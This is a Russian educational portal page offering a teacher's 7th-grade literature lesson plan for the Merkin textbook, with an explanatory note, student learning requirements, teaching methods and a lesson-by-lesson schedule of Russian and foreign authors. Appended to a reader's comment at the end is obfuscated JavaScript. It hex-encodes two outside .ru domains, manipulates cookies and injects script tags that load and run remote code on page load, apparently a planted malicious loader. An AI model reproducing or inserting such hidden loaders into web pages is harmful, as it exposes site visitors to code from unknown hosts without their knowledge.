В вашем браузере отключен JavaScript. Из-за этого многие элементы сайта не будут работать. Как включить JavaScript?

Учебно-Методический портал
Чёрная пятница! С 20 по 22 ноября 2024 г. Скидки 75% на ВСЁ! Подробнее

Календарно-тематическое планирование по литературе по учебнику Меркина Г. С., 7 класс

Календарно-тематическое планирование по литературе по учебнику Меркина Г. С., 7 класс

Юлия Тетерко
Тип материала: Планирование
Рейтинг: 12345 голосов:1просмотров: 16181 комментариев: 1
Краткое описание
Настоящий календарно – тематический план разработан с целью применения к программе по литературе для общеобразовательных учреждений под редакцией Г. С. Меркина, 7 класс.
Описание
Настоящий календарно – тематический план разработан применительно к программе для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, в. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации. Календарно – тематический план ориентирован на использование учебника-хрестоматии для общеобразовательных учреждений «Литература 7 класс» М. «Русское слово» <metricconverter productid=«2008 г» w:st=«on»>2008 г., а также дополнительных пособий для учителя: 1. О. В. Шаталова Дидактические материалы по литературе 7 класс М., «Экзамен» <metricconverter productid=«2008 г» w:st=«on»>2008 г.;
2. О. А. Финтисова Олимпиадные задания по литературе 7 класс Волгоград «Учитель», <metricconverter productid=«2006 г» w:st=«on»>2006 г.;
3. Л. В. Перепилицына Диалоговые формы обучения 5-9 классы Волгоград «Учитель», 2008 г.;
4. Литература в школе. Ежемесячный научно – методический журнал;
5. Ф. Е. Соловьева Рабочая тетрадь к учебнику «Литература. 7 класс» в двух частях, М., «Русское слово», <metricconverter productid=«2010 г» w:st=«on»>2010 г.

Для учащихся: 1. Учебник-хрестоматия «Литература 7 класс» М. «Русское слово» 2008г.;
2. Словари, энциклопедии, художественные тексты.

Настоящий календарно – тематический план учитывает базовый уровень реализации учебной программы. В соответствии с этим реализуется Программа для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, В. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации в объеме 68 часов.

Требования к уровню подготовки учащихся 7 классов (базовый уровень) Должны знать:
· основные понятия (автобиография, аллегория, аллитерация, амфибрахий, анапест, аннотация, антитеза, архаизм, афоризм, баллада, беллетристика, бывальщины, былички, вопленицы, герой, гипербола, гротеск, дактиль, двусложные размеры, деталь, диалог, драма, жанр, завязка, звукопись, идея, инверсия, иносказание, интерпретация, интонация, ирония, композиция, конфликт, крылатые слова, кульминация, легенда, летопись, литературовед, литературоведение, мемуары, метафора, метрически сильное место, мифология, миф, мотив, новелла, олицетворение, пейзаж, пиррихий, повесть, подтекст, портрет, пословица, поэма, предание, плач, притча, проза, псевдоним, публицистика, развязка, рассказ, ритм, рифма, роман, рождественский рассказ, сатира, силлабо-тоническое стихосложение, сказ, сказание, сказка, спондей, средства художественной выразительности, стих, стихотворение, стихотворение в прозе, стопа, сценка, сравнение, строфа, сюжет, творческая история, тема, трагедия, трехсложные стихотворные размеры, устное народное творчество, фантастика, художественное произведение, хорей, цитата, эзопов язык, экспозиция, элегия, эпиграф, эпизод, эпилог, эпитет, эссе, юмор, ямб;
· биографию и основные вехи творчества писателей и поэтов;
· содержание художественных произведений, изученных в 6 классе.
Должны уметь:
· правильно, бегло и выразительно читать тексты художественных и публицистических произведений;
· выразительно читать произведения или отрывки из них наизусть;
· осмысливать и анализировать изучаемые в школе или прочитанные самостоятельно художественные произведения (сказка, стихотворение, глава повести и т.д.);
· определять принадлежность произведения к одному из литературных родов (эпос, лирика, драма), к одному из жанров или жанровых образований (эпические и драматические тексты);
· обосновывать свое суждение, давать характеристику героям, аргументировать отзыв о прочитанном произведении;
· выявлять роль героя, портрета, описания, детали, авторской оценки в раскрытии содержания прочитанного произведения;
· составлять простой и сложный планы изучаемого произведения;
· объяснять роль художественных особенностей произведения и пользоваться справочным материалом учебника;
· подготавливать сообщения, доклады, рефераты, презентации;
· письменно отвечать на вопросы, писать сочинения на литературную и свободную темы;
· выявлять авторское отношение к героям, сопоставлять высказывания литературоведов, делать выводы и умозаключения;
· высказывать собственное суждение об иллюстрациях;
Владеть компетенциями: познавательной, коммуникативной, информационной и рефлексивной.
Способны решать следующие жизненно – практические задачи:самостоятельно приобретать и применять знания в различных ситуациях, работать в группах, аргументировать и отстаивать свою точку зрения, уметь слушать других, извлекать учебную информацию на основе сопоставительного анализа объектов, пользоваться различными словарями и справочниками для нахождения информации, самостоятельно действовать в ситуации неопределенности при решении актуальных для них проблем.

Методы обучения Выбор методов обучения определяю с учетом смысловых целей образования, особенностями предмета, отдельного учебного курса, модуля, целью урока, возможностями школьников, имеющимися средствами обучения.  За основание взяла классификацию методов обучения, предложенную И. Я. Лернером и М. П. Скаткиным по степени познавательной деятельности учащихся: 1. Объяснительно – иллюстрированный (или информационно 0 рецептивный) – учитель сообщает информацию, ученики ее воспринимают; 2. Репродуктивный – учение выполняет действия по образцу учителя; 3. Проблемного изложения – учитель ставит перед детьми проблему и показывает путь ее решения; ученики следят за логикой решения проблемы, получают образец развертывания познания; 4. Частично – поисковый (или эвристический) – учитель расчленяет проблему на части, ученики осуществляют отдельные шаги по решению подпроблем; 5. Исследовательский — поисковая творческая деятельность учащихся по решению новых для них проблем. Планирование см. в архиве П

Дистанционное обучение педагогов по ФГОС по низким ценам

Вебинары, курсы повышения квалификации, профессиональная переподготовка и профессиональное обучение. Низкие цены. Более 19300 образовательных программ. Диплом госудаственного образца для курсов, переподготовки и профобучения. Сертификат за участие в вебинарах. Бесплатные вебинары. Лицензия.

Файлы
ktp_lit_7_klass.doc Скачать

Календарно – тематическое планирование

Число

Тема урока

Количество часов

ФК ГОС

Развитие компетентности

Домашнее задание

Элементы содержания

Требования к уровню подготовки

1


Введение

1

Литература. Литературные роды. Жанр. Жанровое разнообразие.

Знать основные литературоведческие понятия. Знать литературные роды. Знать жанры литературы. Уметь различать роды и жанры. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана.


сообщения

Из устного народного творчества


2


Былины

1

Эпические жанры в фольклоре. Былина – эпическая песня.

Знать понятие «устное народное творчество». Знать эпические жанры в фольклоре. Знать понятие «былина». Знать признаки и особенности былин. Уметь отличать былины от других жанров. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана.


Выучить былину «Илья Муромец»

3


Русские народные песни

1

Песенные жанры в фольклоре. Обрядовая поэзия. Лирические песни. Лироэпические песни.

Знать песенные жанры в фольклоре. Знать особенности песен. Уметь видеть своеобразие поэтического языка народных песен, многозначность поэтического образа в народных песнях. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана.


Выучить народную песню (на выбор)

Из древнерусской литературы

4-5


Из «Повести временных лет»

2

Наставление. Поучение. Житие. Летопись.

Знать эпические жанры и жанровые образования в древнерусской литературе. Знать особенности летописи. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 45-54 прочитать

Из литературы 18 века

6-7


Оды М. В. Ломоносова

2

Ода. Тема. Мотив. Теория о «трех штилях»

Знать биографию и основные вехи творчества М. В. Ломоносова. Знать понятие «ода». Знать теорию о «трех штилях». Уметь видеть тематику поэтических произведений, особенности поэтического языка оды, поэтические образы. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


Выучить оду, с. 63-67

8


Своеобразие стихотворений Г. Р. Державина

1

Лирическое стихотворение.

Знать биографию и основные вехи творчества Г. Р. Державина. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


Выучить термины, с. 75-78 - конспект

9-12


Своеобразие драматургического произведения Д. И. Фонвизина «Недоросль»

4

Юмор. Сатира. Сарказм. Драма. «Говорящие» фамилии. Пьеса. Классицизм.

Знать краткие сведения о писателе. Знать понятия «юмор», «сатира», «сарказм», «драма», «пьеса», «классицизм». Уметь видеть своеобразие драматургического произведения, основной конфликт. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


Презентация;

Прочитать «Недоросль»;

Заполнить дневники чтения;

сочинение

Из литературы 19 века

13-16


В мире поэтического слова А. С. Пушкина

4

Поэма. Художественный образ. Прототип. Тропы. Дружеское послание.

Знать биографию и основные вехи творчества А. С. Пушкина. Знать тропы. Знать понятие «поэма». Знать отличия поэмы от других жанров. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 131-137 пересказ;

«К Чаадаеву» выучить;

Термины выучить; с. 144-158

17-19


В мире поэтического слова М. Ю. Лермонтова

3

Жанры лирики. Лирический сюжет. Композиция. Прием контраста. Стилизация.

Знать биографию и основные вехи творчества М. Ю. Лермонтова. Знать жанры лирики. Знать художественные приемы. Знать понятие «композиция». Уметь видеть художественное богатство произведения. Уметь определять тему, композицию произведения. Уметь видеть фольклорные элементы в произведении. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 160 – 164 – план;

«Родина» - выучить;

168 -184;

20-22


В мире художественного слова Н. В. Гоголя

3

Сатирическая повесть. «Говорящие» фамилии.

Знать краткие сведения о писателе. Уметь определять тему и основной конфликт произведения. Уметь видеть трагическое и комическое. Уметь видеть авторское отношение к героям и событиям. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 192-231-прочитать;

Составить цитатный план;

Выписать характеристики героев, сочинение.

23-25


В мире художественного слова И. С. Тургенева

3

Портрет, характер, стихотворение в прозе.

Знать краткие сведения о писателе. Уметь определять тему и основной конфликт произведения. Знать общую характеристику книги «Записки охотника». Знать содержание рассказов. Уметь видеть многообразие и сложность характеров крестьян в изображении Тургенева. Уметь определять тематику, художественное богатство рассказов и стихотворения в прозе. Уметь видеть отношение автора к героям. Уметь составлять портретные характеристики. Владеть навыками выразительного чтения, пересказа, анализа произведения


С. 232 -238 пересказ,

238-274 - прочитать.

Заполнить таблицы.

26-29


Своеобразие поэтического мира Н. А. Некрасова.

4

Доля народная – основная тема произведений писателя. Писатель и власть. Судьба русской женщины. Диалоговая речь. Поэма.

Знать краткие сведения о поэте. Знать основные темы произведений Некрасова. Уметь определять основную проблематику произведений. Уметь видеть художественно – выразительные средства и определять их значение. Владеть навыками выразительного чтения, составления цитатного плана, тезисного плана; владеть навыками составления портретных характеристик.


Выучить записи в тетрадях;

С. 279-310 – прочитать;

Интерпретации;

Выписать художественно-выразительные средства.


30-32


Сказки М. Е. Салтыкова- Щедрина

3

Сказка, сатира, сатирический образ, сатирический персонаж и тип. Притчевый характер сказок, мораль, своеобразие художественно – выразительных средств, тропы.

Знать краткие сведения о писателе. Уметь определять своеобразие сюжетов в сказках. Уметь видеть проблематику сказок. Уметь определять приемы создания образов помещиков, уметь видеть позицию писателя. Уметь видеть художественно – выразительные средства и определять их значение. Уметь вычленять мораль в тексте. Владеть навыками выразительного чтения, различными видами пересказа. Владеть навыками рисования иллюстраций к произведениям, составления письменного отзыва.


С. 313-316 – конспект;

С. 316-334 – прочитать;

иллюстрации

33-34


В мире художественного слова Л. Н. Толстого

2

Литература и история. Рассказ. Книга рассказов. Человек и война, жизнь и смерть, героизм, подвиг, защита Отечества – основные темы рассказа.

Знать краткие сведения о писателе. Знать о Толстом как об участнике обороны Севастополя. Знать творческую историю «Севастопольских рассказов». Знать историю обороны Севастополя. Знать основные темы рассказа «Севастополь в декабре месяце». Уметь видеть авторское отношение к героям, образы защитников Севастополя. Владеть навыками выразительного чтения, анализа произведения, составления конспекта, различными видами пересказа.


С. 340-358 – прочитать; с. 359-360 – ответить на вопросы.

35-37


В мире художественного слова Н. С. Лескова

2

«Лесков – писатель будущего». Своеобразие стиля повести. Сказовый характер прозы. Сказ.

Знать краткие сведения о писателе. Знать особенности проблематики и центральную идею повести «Левша». Уметь видеть образный мир произведения. Владеть навыками выразительного чтения, анализа произведения, составления конспекта, создания интерпретаций. Владеть различными видами пересказа.


Прочитать «Левша», анализ эпизода, презентация.

38


Поэзия А. А. Фета

1

Поэзия.

Знать основные вехи творчества А. А. Фета, знать особенности творчества, стихотворение наизусть. Уметь находить тропы в стихотворении. Владеть навыками выразительного чтения стихотворений.


Стихотворение наизусть (на выбор)

39-40


В мире художественного слова А. П. Чехова

2

Юмор. Сатира.

Знать сведения из жизни писателя. Знать основные темы произведений А. П. Чехова. Владеть навыками анализа произведения.


«Хамелеон», «Смерть чиновника» прочитать;

Заполнить дневники чтения

41


Произведения русских поэтов о России

1

Патриотизм, тропы

Знать русских поэтов. Знать произведения русских поэтов о России. Уметь находить основную мысль, тропы, уметь видеть структуру стихотворений.


Выучит наизусть стихотворение о России (на выбор)

Из русской литературы 20 века


42-44


В мире художественного слова Максима Горького

3

Автобиография, легенда, романтизм

Знать значение термина «романтизм», знать основные произведения писателя. Владеть навыками выразительного чтения, анализа произведения. Владеть навыками письма сочинения по литературе.


С. 4-7 прочитать,

С. 7-11 конспект

С. 11-вопросы;

С. 12-60-прочитать, с. 61-66 прочитать с. 67-70-анализ; сочинение(на выбор)

45-46


В мире художественного слова И. А. Бунина

2

Образы-персонажи, образы животных, пейзаж, художественные средства

Знать биографию и основные вехи творчества И. А. Бунина. Знать жанры лирики. Знать художественные приемы. Знать понятие «композиция». Уметь видеть художественное богатство произведения. Уметь определять тему, композицию произведения. Уметь видеть фольклорные элементы в произведении. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 71-72 пересказ, с. 73-наизусть;

С. 74-93 прочитать, с. 93-94вопросы.

47-48


В мире художественного слова А. И. Куприна

2

Анекдот, говорящие фамилии, художественная деталь

Знать краткие сведения о писателе. Знать основные темы произведений Куприна. Уметь определять основную проблематику произведений. Уметь видеть художественно – выразительные средства и определять их значение. Владеть навыками выразительного чтения, составления цитатного плана, тезисного плана; владеть навыками составления портретных характеристик.


План «Отношение Куприна к творчеству», с. 98-104;

С. 106-112 – прочитать, вопросы.

49


Поэзия В. В. Маяковского

1

Аллитерация, лесенка

Знать биографию и основные вехи творчества Маяковского. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


Презентация, с. 117-121, с. 122-123 - анализ

50


Поэзия С. А. Есенина

1

Образ родины

Знать биографию и основные вехи творчества С. А.Есенина. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


Стихотворение наизусть (на выбор), интерпретация стихотворения


51


В мире художественного слова И. С. Шмелева

1


Знать основные сведения биографии писателей. Знать основные произведения писателей. Знать темы произведений. Знать литературоведческие термины. Уметь выполнять анализ произведений, уметь находить средства художественной выразительности. Уметь определять композицию произведения. Владеть навыками сопоставления, выразительного чтения, составления таблиц, кроссвордов и пересказов.


С. 135-138, с. 138-139 - вопросы

52


В мире художественного слова М. М. Пришвина

1



С. 142-147, с. 147-148 - анализ

53


В мире художественного слова К. Г. Паустовского

1



С. 151 – 159, с. 160-162 - письменно

54


В мире художественного слова Н. А. Заболоцкого

1

Эссе, кольцевая композиция, повтор


С. 164-165 - наизусть

55-56


В мире художественного слова А. Т. Твардовского

2

поэма

Знать термин «поэма». Знать основные литературоведческие понятия. Знать литературные роды. Знать жанры литературы. Уметь различать роды и жанры. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана. Уметь определять тематику, художественное богатство рассказов и стихотворений. Уметь видеть отношение автора к героям. Уметь составлять портретные характеристики. Владеть навыками выразительного чтения, пересказа, анализа произведения


С. 170 – 185, с. 185-191 – конспект; отрывок из поэмы наизусть

57


Лирика поэтов-участников ВОВ

1

Лирика, военная тематика

Знать поэтов-участников ВОВ. Знать произведения поэтов. Владеть навыками выразительного чтения.


Стихотворение наизусть, выставка поэтов-участников ВОВ

58-59


В мире художественного слова В. М. Шукшина

2

Средства художественной выразительности

Знать биографию и творческий путь В. М. Шукшина. Знать основные произведения В. М. Шукшина. Владеть навыками письма сочинения-размышления. Владеть навыками выразительного чтения, чтения по ролям.


С. 227-231 пересказ.

232-248 прочитать, сочинение (темы-на с. 249)

60-61


Русские поэты 20 века о России

2

Поэзия

Знать биографию и основные вехи творчества поэтов 20 века. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 250-255, стихотворение наизусть (на выбор), анализ стихотворения письменно, с. 255-вопросы.

Из зарубежной литературы

62-63


Сонеты Уильяма Шекспира

2

Сонет

Знать определение термина «сонет». Знать строение сонетов. Знать особенности творчества У. Шекспира, основные его произведения. Владеть навыками анализа сонетов. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 257-259 конспект, 259-261-прочитать. Сонет (на выбор) наизусть.

С. 261 – вопросы.

64


В мире поэтического слова Р. Бернса

1

Средства художественной выразительности

Знать биографию и основные вехи творчества Р. Бернса. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 263-264, с. 265-270. Анализ стихотворения письменно.

65


В мире художественного слова Р. Л. Стивенсона

1

Приключенческая литература

Знать особенности жанра приключенческой литературы.


С. 271, с. 272-289 прочитать. Заполнить дневники чтения.

66


Хокку японского поэта Мацуо Басё

1

хокку

Знать понятие «хокку». Знать особенности хокку. Уметь анализировать хокку и понимать их смысл. Уметь видеть средства художественной выразительности и объяснять их роль в поэтическом тексте. Владеть навыками выразительного чтения


С. 291-301-пересказ, работа по группам. Выучить хокку (на выбор) наизусть.

Сочинить хокку самостоятельно.

67


В мире художественного слова Антуана де Сент - Экзюпери

1

фантастика

Знать биографию и особенности творчества Антуана де Сент – Экзюпери. Уметь определять основную проблематику произведений. Уметь видеть художественно – выразительные средства и определять их значение. Владеть навыками выразительного чтения, составления цитатного плана, тезисного плана; владеть навыками составления портретных характеристик


С. 303-304, с. 322.

С. 322-вопросы

68


В мире художественного слова белорусского поэта Янки Купалы

1

Поэзия, стихотворный размер

Знать биографию и основные вехи творчества поэта. Знать особенности белорусской литературы. Уметь видеть своеобразие стихотворений. Владеть навыками сопоставления стихотворений. Уметь находить выразительные средства в стихотворном тексте. Владеть навыками выразительного чтения, пересказа, анализа произведения; составления таблиц, конспектов и плана


С. 323-325 – конспект.

С. 327-331 – выразительное чтение.

69


Повторение.

1




С. 334-340 – выучить литературоведческие термины, презентация, заполнить дневники чтения.

70


Заключительный урок.

1




Взять книги для чтения в летний период.



Пояснит.записка лит-ра 7.doc Скачать

Календарно – тематическое планирование по литературе по учебнику Меркина Г. С., 7 класс.

Автор: учитель русского языка и литературы Тетерко Ю. А.



Пояснительная записка

Настоящий календарно – тематический план разработан применительно к программе для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, в. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации. Календарно – тематический план ориентирован на использование учебника-хрестоматии для общеобразовательных учреждений «Литература 7 класс» М. «Русское слово» 2008 г., а также дополнительных пособий для учителя:

  1. О. В. Шаталова Дидактические материалы по литературе 7 класс М., «Экзамен» 2008 г.;

  2. О. А. Финтисова Олимпиадные задания по литературе 7 класс Волгоград «Учитель», 2006 г.;

  3. Л. В. Перепилицына Диалоговые формы обучения 5-9 классы Волгоград «Учитель», 2008 г.;

  4. Литература в школе. Ежемесячный научно – методический журнал;

5. Ф. Е. Соловьева Рабочая тетрадь к учебнику «Литература. 7 класс» в двух частях, М., «Русское слово», 2010 г.



Для учащихся:

  1. Учебник-хрестоматия «Литература 7 класс» М. «Русское слово» 2008г.;

  2. Словари, энциклопедии, художественные тексты.



Настоящий календарно – тематический план учитывает базовый уровень реализации учебной программы. В соответствии с этим реализуется Программа для общеобразовательных учреждений под редакцией Г. С. Меркина, С. А. Зинина, В. А. Чалмаева 5-11 класс М. «Русское слово» 2005г., рекомендованной Министерством образования и науки Российской Федерации в объеме 68 часов.



Требования к уровню подготовки учащихся 7 классов (базовый уровень)

Должны знать:

  • основные понятия (автобиография, аллегория, аллитерация, амфибрахий, анапест, аннотация, антитеза, архаизм, афоризм, баллада, беллетристика, бывальщины, былички, вопленицы, герой, гипербола, гротеск, дактиль, двусложные размеры, деталь, диалог, драма, жанр, завязка, звукопись, идея, инверсия, иносказание, интерпретация, интонация, ирония, композиция, конфликт, крылатые слова, кульминация, легенда, летопись, литературовед, литературоведение, мемуары, метафора, метрически сильное место, мифология, миф, мотив, новелла, олицетворение, пейзаж, пиррихий, повесть, подтекст, портрет, пословица, поэма, предание, плач, притча, проза, псевдоним, публицистика, развязка, рассказ, ритм, рифма, роман, рождественский рассказ, сатира, силлабо-тоническое стихосложение, сказ, сказание, сказка, спондей, средства художественной выразительности, стих, стихотворение, стихотворение в прозе, стопа, сценка, сравнение, строфа, сюжет, творческая история, тема, трагедия, трехсложные стихотворные размеры, устное народное творчество, фантастика, художественное произведение, хорей, цитата, эзопов язык, экспозиция, элегия, эпиграф, эпизод, эпилог, эпитет, эссе, юмор, ямб;

  • биографию и основные вехи творчества писателей и поэтов;

  • содержание художественных произведений, изученных в 6 классе.

Должны уметь:

  • правильно, бегло и выразительно читать тексты художественных и публицистических произведений;

  • выразительно читать произведения или отрывки из них наизусть;

  • осмысливать и анализировать изучаемые в школе или прочитанные самостоятельно художественные произведения (сказка, стихотворение, глава повести и т.д.);

  • определять принадлежность произведения к одному из литературных родов (эпос, лирика, драма), к одному из жанров или жанровых образований (эпические и драматические тексты);

  • обосновывать свое суждение, давать характеристику героям, аргументировать отзыв о прочитанном произведении;

  • выявлять роль героя, портрета, описания, детали, авторской оценки в раскрытии содержания прочитанного произведения;

  • составлять простой и сложный планы изучаемого произведения;

  • объяснять роль художественных особенностей произведения и пользоваться справочным материалом учебника;

  • подготавливать сообщения, доклады, рефераты, презентации;

  • письменно отвечать на вопросы, писать сочинения на литературную и свободную темы;

  • выявлять авторское отношение к героям, сопоставлять высказывания литературоведов, делать выводы и умозаключения;

  • высказывать собственное суждение об иллюстрациях;

Владеть компетенциями: познавательной, коммуникативной, информационной и рефлексивной.

Способны решать следующие жизненно – практические задачи: самостоятельно приобретать и применять знания в различных ситуациях, работать в группах, аргументировать и отстаивать свою точку зрения, уметь слушать других, извлекать учебную информацию на основе сопоставительного анализа объектов, пользоваться различными словарями и справочниками для нахождения информации, самостоятельно действовать в ситуации неопределенности при решении актуальных для них проблем.



Методы обучения

Выбор методов обучения определяю с учетом смысловых целей образования, особенностями предмета, отдельного учебного курса, модуля, целью урока, возможностями школьников, имеющимися средствами обучения.

За основание взяла классификацию методов обучения, предложенную И. Я. Лернером и М. П. Скаткиным по степени познавательной деятельности учащихся:

    1. Объяснительно – иллюстрированный (или информационно 0 рецептивный) – учитель сообщает информацию, ученики ее воспринимают;

    2. Репродуктивный – учение выполняет действия по образцу учителя;

    3. Проблемного изложения – учитель ставит перед детьми проблему и показывает путь ее решения; ученики следят за логикой решения проблемы, получают образец развертывания познания;

    4. Частично – поисковый (или эвристический) – учитель расчленяет проблему на части, ученики осуществляют отдельные шаги по решению подпроблем;

    5. Исследовательский - поисковая творческая деятельность учащихся по решению новых для них проблем.



ktp_lit_7_klass.rar Скачать
Обсуждение материала
Людмила Микулич
24.08.2015 16:36
Спасибо большое!!!window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6172",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("uchmet.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Для добавления отзыва, пожалуйста, войдите или зарегистрируйтесь.
Образовательные вебинары
Подписаться на новые Расписание вебинаров
Задать вопрос